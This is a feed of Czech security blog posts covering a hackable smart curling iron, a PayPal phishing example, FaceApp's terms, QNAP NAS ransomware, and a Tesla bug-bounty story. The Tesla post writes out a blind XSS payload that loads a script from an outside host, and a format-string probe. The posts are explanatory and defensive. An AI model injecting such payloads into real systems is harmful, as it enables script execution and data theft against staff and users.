VIRY.CZ

Syndikovat obsah
Když se havěť stává obětí
Aktualizace: 15 min 48 sek zpět

Splněný sen! Kulma na vlasy s ovládáním přes mobil je tu!

6 Srpen, 2019 - 12:40

Společnost Glamoriser vyrobila první chytrou kulmu na světě s bezdrátovým ovládáním skrze bluetooth z chytrého mobilního telefonu. Kombinace slov jako „chytrý“ (smart), „první na světě“, „bluetooth“, přitom často zavání pr*serem a tento výrobek je toho důkazem…

Kulma na vlasy byla promována během vánoc ve Velké Británii a tak si ji pořídili i kluci z Pen Test Partners a podrobili testu.

Do chytrého mobilního telefonu si lze aplikaci Glamoriser stáhnout z Google Play či Apple Store. Kromě toho, že si v ní můžete vést deníček a plánovat například další hrátky s kulmou, lze nastavit i teplotu kulmy a čas do vypnutí.

Testovaná verze aplikace pro Android se vyznačuje tím, že o každé komunikaci s kulmou zapisuje detailní žurnál. Tento protokol v podobě souboru usnadnil testerům pochopit způsob komunikace mezi kulmou a telefonem a přijít s alternativním ovládáním skrze příkazový řádek.

Jdeme grilovat!

Aplikace zároveň umožňuje vnutit kulmě vlastní nastavení a přepsat to, které bylo nastaveno na kulmě samotné. Tedy teplotu a čas do vypnutí. Takže například z teploty 120°C na 5 minut můžete přes bluetooth vykouzlit 235°C na 20 minut. Když k tomu připojíme fakt, že kulmu není nutné s mobilním telefonem přes bluetooth párovat (!!!), pr*ser je na světě!

Co to znamená v praxi? Stačí být pár metrů od této chytré kulmy značky Glamoriser a bez fyzického přístupu se k ní můžete vzdáleně připojit a majitelce doslovně zatopit. Pro útočníky je pak ideální, pokud jde rovnou o velký kosmetický salón Připomeňme ještě, že ke kulmě může být připojeno v daný okamžik pouze jedno bluetooth zařízení. Obranou před útočníky je tak paradoxně využití této nesmyslné funkcionality samotným uživatelem kulmy…

Smutný závěr

Ač může být výše uvedený text považován za vtipný, ve skutečnosti představuje smutnou realitu. „Internet věcí“ – Internet of Things – IoT, tedy „chytré“ výrobky, které lze připojit k internetu či propojit s okolím, představují z pohledu bezpečnosti velký průšvih. Výrobci často problematiku bezpečnosti zcela ignorují a ženou se především za ziskem a senzacemi. Produkují tak nové a nové modely, zatímco kašlou na podporu těch starších (což je kritické například u WiFi routerů, kterými jsme připojeni k internetu). Je potřeba si uvědomit, že podobné problémy se mohou týkat i „chytrých“ žárovek, ledniček, televizorů, hajzl prkének (ano i ty fungují přes bluetooth a lze je „hacknout“), ode dneška kulem, ale třeba i automobilů – viz. starší článek o Jeepu Cherokee, který byl vzdáleně přes internet poslán do příkopu i s řidičem!

The post Splněný sen! Kulma na vlasy s ovládáním přes mobil je tu! appeared first on VIRY.CZ.

Kategorie: Viry a Červi

Jak jsem odevzdal platební kartu a občanku podvodníkům

30 Červenec, 2019 - 12:01

Tohle mně dorazilo do emailové schránky. Prý mně byl zablokován účet na PayPalu. Bylo potřeba konat!

Obsah e-mailové zprávy:

Službu PayPal používám, takže informace hltám a mačkám „Potvrdit můj účet“. Nechci, aby byl můj účet na PayPal blokován. Objeví se tahle stránka, tudíž zadávám přihlašovací údaje do služby PayPal:

I když jsem si skoro jistý, že jsem se v hesle uklepl, byl to jenom pocit. Přihlásil jsem se na poprvé. Ten den jsem měl prostě štěstí!

Údaje jsem poctivě vyplnil. V dalším kroku jsem byl požádán o nahrání fotografie, kde budu já a v ruce budu držet platební kartu a občanský průkaz. Pro potvrzení mojí identity. Šlo to blbě, tak mě nakonec fotila manželka.

Vše nakonec dobře dopadlo, účet byl odblokován!

Realita?

Ve skutečnosti jsem se napálit nenechal Šlo samozřejmě o podvodnou techniku využívanou k získání cizích citlivých údajů. V tomto případě k získání kopie občanského průkazu a údajů o platební kartě. K nalákání uživatelů se přitom zneužívají názvy známých bankovních institucí a služeb (v tomto případě PayPal). Útoku říkáme PHISHING. Význam tohoto podvodu? Podvodníci mohou platit Vaší platební kartou či si uzavírat smlouvy na váš občanský průkaz. Nemluvě o získání přístupu ke službě, k níž jsme prozradili přihlašovací jméno a heslo.

Jak rozpoznat phishing / podvod?
  • Řada phishingových útoků trpí nekvalitním překladem do českého jazyka (nesmyslný slovosled, částečně chybějící diakritika, …). Jak ale praxe ukazuje, nemusí to být překážkou.
  • Pokud se podvodníci vydávají za PayPal, tedy službu, která běží na doméně paypal.com, pak není možné, aby nás nutili zadávat citlivé informace kdekoliv jinde, zde například na doméně teckotive.com. I pokud by šlo o adresu https://paypal.teckotive.com, je to špatně.
  • Podvodníci si v tomhle případě nezajistili ani validní SSL certifikát, tudíž třeba prohlížeč Google Chrome takhle varuje i před nezabezpečeným spojením HTTPS. Z toho plyne důležité sdělení: Zabezpečené HTTPS spojení není zárukou, že jde o bezpečnou / „hodnou“ stránku! Jinak řečeno, i útočníci mohou mít zabezpečené HTTPS stránky se symbolem zámku! Není to ale případ tohoto konkrétního podvodu.

Připomeňme, že tohle je oficiální adresa pro přihlášení ke službě PayPal:

  • Dobrou zbraní pro odhalování podvodů je i použití zdravého rozumu.
Závěr

Více o phishingu a zdravém rozumu lze najít například v PDF knize o havěti, případně v tištěné variantě, kterou posíláme s tričkem 20 let VIRY.CZ.

A protože teď letí aplikace FaceApp a při ruce jsem neměl občanský průkaz ani platební kartu manželky, poslal jsem podvodníkům alespoň tohle

The post Jak jsem odevzdal platební kartu a občanku podvodníkům appeared first on VIRY.CZ.

Kategorie: Viry a Červi

FaceApp, aneb čteme obchodní podmínky?

25 Červenec, 2019 - 07:55

Jestliže jste se v uplynulých dnech byť jen krátce mihli na Facebooku, patrně jste si všimli záplavy selfies svých přátel, které vygenerovala umělá inteligence a které zobrazovaly, jak budou tito lidé vypadat za pár desítek let. Zaznamenali jste možná i varovné komentáře, které upozorňovaly, že tito uživatelé tímto upsali svou duši jakési neznámé ruské firmě. Už je to tak, nadešel čas na dalšího digitálního internetového strašáka. Ten z uplynulého týdne se jmenuje FaceApp.

FaceApp, což nemá nic společného s výrazem Facebook, je aplikace ruské společnosti Wireless Lab pro systémy iOS a Android vydaná již v roce 2017. Umožňuje nahrát selfie, s nímž poté pracuje a mění výraz tváře, věk a dokonce i pohlaví. Soudě podle tisíců obrázků na Facebooku, výsledek je velmi přesvědčivý.

Drakonické obchodní podmínky

I když aplikace nabízí „stárnoucí“ filtr téměř od samotného zveřejnění, bleskově se rozšířila až minulý týden, kdy někdo upozornil na skutečnost, že si firma vyhrazuje plná práva na zpracovávané snímky. Obchodní podmínky jsou velmi drakonické:

Dáváte aplikaci FaceApp trvalou, neodvolatelnou, nevýhradní, bezplatnou, celosvětovou, přenositelnou a dále zprostředkovatelnou licenci k použití, reprodukci, úpravám, přizpůsobování, publikování, překladu, vytváření odvozených děl, distribuci a veřejnému předvádění a zobrazování vašeho uživatelského obsahu a jakéhokoli jména, uživatelského jména a vyobrazení poskytnutých ve spojitosti s vaším uživatelským obsahem ve všech mediálních formátech a kanálech známých nyní či vyvinutých později, bez nároku na kompenzaci vůči vaší osobě. Když vložíte nebo jinak nasdílíte uživatelský obsah v našich službách nebo jejich prostřednictvím, dáváte souhlas s tím, že váš uživatelský obsah a veškeré související informace (například vaše uživatelské jméno, poloha nebo profilový snímek) budou veřejně viditelné.

Neodvolatelnost & Rusko = problém

Internetovou komunitu rozrušil u specifikace licence zejména pojem ‚neodvolatelná‘, což vedlo dokonce ke zkoumání v Kongresu Spojených států amerických. Senátor Chuck Schumer napsal minulou středu na Twitteru o svých starostech ohledně aplikace předsedovi Federální obchodní komise následující: „Ruská lokalita vzbuzuje u aplikace FaceApp otázky ohledně času a způsobu, jimiž tato společnost zpřístupňuje data amerických občanů třetím stranám, včetně možnosti předání zahraničním vládám“.

Mnoho dalších tiskových zpráv a příspěvků na sociálních médiích rovněž vyjadřovalo obavy ze stejných dvou důvodů – neodvolatelnost a Rusko. Podle internetového magazínu TechCrunch však firma prohlásila, že nahrává pouze snímky vybrané uživatelem k editaci a může je ukládat v cloudu, protože tam se zpracovávají. Dodala, že obvykle snímky ze svých serverů smaže během 48 hodin. Rovněž sdělila, že nezasílá uživatelská data do Ruska, ale zpracovává je v rámci infrastruktury poskytovatelů cloudových služeb v USA.

Facebook a další

Každá aplikace, která ve svých obchodních podmínkách odpírá uživateli nějaká práva, by v nás měla vzbudit podezření. Ale i podmínky jiných služeb jsou znepokojivé, i když nejsou tak agresivní.

Například Facebook sice říká, že uživatel je majitelem svého vlastního obsahu, ale firma může použít jeho obrázek společně s daty o aktivitě na Facebooku v souvislosti s jakoukoli reklamou nebo sponzorovaným obsahem. Firma může sdílet obrázek se třetími stranami, včetně nespecifikovaných poskytovatelů služeb podporujících Facebook. Říká, že smlouvu s Facebookem lze ukončit smazáním snímku, ten se však může objevovat i nadále, jestliže jste jej sdíleli s ostatními, kteří jej nesmazali.

Můžeme se podívat například i na zásady ochrany osobních údajů serveru Accuweather – firmy, která ztratila uživatele poté, co se zjistilo, že odesílá data o poloze. Důvodem bylo, že zásady firmy umožňují shromažďovat informace o dalších blízkých zařízeních, včetně routeru Wi-Fi. Obchodní podmínky firmy rovněž umožňují využít identifikátor zařízení a informace z nositelných zařízení jako jsou hodnoty pulsu nebo tělesné teploty. Puls a tělesná teplota…pro aplikaci o počasí?!

Čteme obchodní podmínky?

Můžeme si dělat starosti i s firmou Wireless Lab, která používá naše fotografie pro své vlastní účely, ale jak už víme, dělají to i ostatní západní společnosti, včetně YouTube a IBM. Zdá se, že v případě FaceApp internetová komunita přijala nepochybně nekvalitně napsaný, prefabrikovaný právní text, zjistila, že vlastník aplikace je z Ruska, a zešílela z toho. Smlouva popírající ochranu soukromí by nás měla znepokojovat, ale skutečné obavy vzbuzuje fakt, jak málo lidí věnuje čas přečtení obchodních podmínek dobře známých aplikací, ať už pocházejí odkudkoli.

The post FaceApp, aneb čteme obchodní podmínky? appeared first on VIRY.CZ.

Kategorie: Viry a Červi

Útočníci mohou jít po krku i centrálnímu úložišti a zálohám

22 Červenec, 2019 - 12:21

Havěť z kategorie ransomware se může v některých případech zaměřit i na servery, které poskytují sdílené informace, dokumenty, soubory, …, napříč firmou a též zajišťují roli úložiště záloh. Pojďme se podívat na nový „kousek“, povědět něco o prevenci a o tom, co útočníci nedomysleli

Jatka na disku

Analytici tuhle havěť nazvali jako QNAPCrypt (jinde ECh0raix), neboť se zaměřuje na NAS společnosti QNAP. Havěť se snaží hrubou silou (brute force) odhalit heslo uživatele root a do zařízení se dostat skrze SSH. Jakmile se ji to podaří, zkontaktuje útočníkův server v internetu a zažádá si u něj o veřejný RSA klíč, ID bitcoinové peněženky (oboje unikátní pro každou oběť) a zahájí na zařízení jatka. Klíčem zašifruje data na NAS zařízení, čimž je znehodnotí a ID bitcoinové peněženky pak naservíruje nebohému správci sítě, aby věděl, kam poslat případné výkupné. Obnova dat ze strany útočníků je podmíněna právě zaplacením výkupného. To jestli útočníci pomohou s obnovou dat či nikoliv, je zcela na nich. Peníze mohou klidně jen vyinkasovat, zmizet a začít chystat další sofistikovanější útok.

Network Attached Storage (NAS) společnosti QNAP Majstrštyk analytiků

Více prostoru si tahle havěť nezaslouží, neboť asi nepůjde o něco, co by se ve větší míře objevovalo. Pozornost si naopak zaslouží majstrštyk analytiků, kteří první variantu havěti vyřadili z provozu. Pointou byl fakt, že aby havěť zašifrovala data, nutně potřebovala získat ze serveru útočníka klíč i ID bitcoinové peněženky, unikátní pro každou oběť. Analytici tak nasimulovali fiktivní útok na ~2 tisíce zařízení, což stačilo k tomu, aby útočníkům došla zásoba peněženek. Do dalších reálných zařízení se tak sice havěť dokázala nabourat, ale tam následně „umřela“ následkem toho, že ze serveru útočníka nedostala požadované informace. K zašifrování souborů tak nedošlo. Více informací v originálním článku.

Pár rad do života

Na závěr pár informací k prevenci.

  • Nastavte silné heslo pro přístup k administraci NAS (více o heslech třebas v téhle PDF knize).
  • Zakážte přístup přes port SSH (TCP/port 22), pokud to není nezbytně nutné. Další doporučení k navýšení bezpečnosti lze najít přímo na webu výrobců (QNAP, Synology).
  • Nevystrkujte NAS do internetu. Pokud je to nutné, tak jen nezbytně nutné porty a bez portu SSH.

V praxi se setkáme především s ransomwarem, k jehož spuštění dojde přímo na stanici uživatele (stolním PC, notebooku, …) a na souborový server se zašifrované soubory zavlečou právě z těchto koncových bodů skrze síťově sdílené složky. Z tohoto plyne, že antivirová ochrana by měla být řešena především na stanicích (endpointech) a sekundovat by mělo antivirové zabezpečení serveru. Samotný antivirus na serveru však v tomhle případě žádnou ochranu nezajistí. Antivirus tam totiž nepřichází do styku s havětí, ale pouze s jeho „produktem“, zašifrovanými soubory, na kterých nic závadného není. A tímto se opět dostáváme k tomu, že ideální prevencí je zálohování. Více informací v nedávném článku Někdo platí, někdo zálohuje.

The post Útočníci mohou jít po krku i centrálnímu úložišti a zálohám appeared first on VIRY.CZ.

Kategorie: Viry a Červi

Když si šťoural koupí auto

18 Červenec, 2019 - 14:24

„Ajťák“ Sam Curry si koupil auto, resp. elektromobil Tesla Model 3. Kromě toho, že s ním jezdil, vysedával i dlouhé hodiny v garáži a hledal chyby v jeho elektronice…

Zrychlení pod 6 sekund a má to internetový prohlížeč

Připomeňme, že Tesla Model 3 je elektromobil, který zrychlí z 0-100 km/h pod 6 sekund, má dojezd přes 400 km, ale především má tablet s obří úhlopříčkou, s webovým prohlížečem, LTE připojením k internetu, včetně online aktualizací softwaru v autě.

Tesla Model 3

Pan Sam Curry si tohle auto koupil a v tabletu uvnitř vozu si ho pojmenoval jako %x.%x.%x.%x. Prostě zcela běžné pojmenování vozu typického smrtelníka Ve skutečnosti reagoval na skutečnost, že vozy BMW měly s těmito názvy problém v souvislosti s párováním zařízení přes bluetooth. Palubní systém vozů BMW to prostě zaseklo. V případě Tesly se ale žádný problém nevyskytl.

Tablet s LTE internetem Název auta? Třeba: „><script src=…

Pak automobil pojmenoval jako „><script src=//zlz.xss.ht></script> s cílem odhalit možnost použití cross site scripting (XSS) útoku. Využil k tomu službu XSS Hunter. Takový útok se ale nepodařilo vyvolat, tudíž i zde vše v pořádku. Sam Curry hledání chyb vzdal, zároveň ale zapomněl změnit název automobilu na něco smysluplného.

Někdo si auto pojmenuje jako „miláček“, někdo takhle… Kamínek + prasklé sklo spustilo útok

O dva měsíce později, tentokrát za jízdy, přilétl odněkud kamínek a způsobil prasknutí předního skla vozidla. Návštěvu servisu dohodl moderně opět skrze aplikaci v automobilu. Kromě toho, že druhý den dostal reakci od výrobce, zároveň mu služba XSS Hunter e-mailem ohlásila, že se někdo „chytil“ na zlz.xss.ht.

Prasklé přední sklo vše odstartovalo…

Co to v praxi znamená? Samotný automobil Tesla Model 3 je proti XSS útokům patrně imunní, ale servisní aplikace u výrobce Tesly nikoliv. Jakmile název vozidla „><script src=//zlz.xss.ht></script> doputoval do servisní aplikace výrobce v rámci hlášení o prasklém skle, vyvolalo to XSS v momentě, kdy ho začal vyřizovat zaměstnanec. V servisní aplikaci se tak spustil cizí skript služby XSS Hunter, která mimo jiné „vyfotí“ to, co je zrovna na monitoru.

Díky tomu víme, co všechno ví výrobce o uživatelích vozů Tesla a můžeme si domýšlet, co všechno může na dálku provádět. O automobilu Sama Curryho věděl výrobce minimálně toto:

VIN: 5YJ3E13374KF2313373 Car Type: 3 P74D Birthday: Mon Mar 11 16:31:37 2019 Car Version: develop-2019.20.1-203-991337d Car Computer: ice SOE / USOE: 48.9, 48.9 % SOC: 54.2 % Ideal energy remaining: 37.2 kWh Range: 151.7 mi Odometer: 4813.7 miles Gear: D Speed: 81 mph Local Time: Wed Jun 19 15:09:06 2019 UTC Offset: -21600 Timezone: Mountain Daylight Time BMS State: DRIVE 12V Battery Voltage: 13.881 V 12V Battery Current: 0.13 A Locked?: true UI Mode: comfort Language: English Service Alert: 0X0

V servisní aplikaci byly dále k vidění záložky (tedy i další funkcionalita) Releases, Packages, Jobs, OTA Job Matrics, Issues, Rollouts, Vehicles, VHCs. Úspěšný útok byl vykonán na adrese https://redacted.teslamotors.com/redacted/5YJ31337 (adresa není z internetu dostupná). Je pravděpodobné, že útok by bylo možné dále rozvíjet a načítat informace i o cizích automobilech značky Tesla a možná i vzdáleně měnit jejich nastavení!

Dobrý konec

Sam Curry je ale „hodný hacker“ a tak chybu ohlásil, Tesla ji opravila a v rámci programu bug bounty mu vyplatila 10 tisíc dolarů za odhalení závažné chyby. Celý příběh je k přečtení zde.

The post Když si šťoural koupí auto appeared first on VIRY.CZ.

Kategorie: Viry a Červi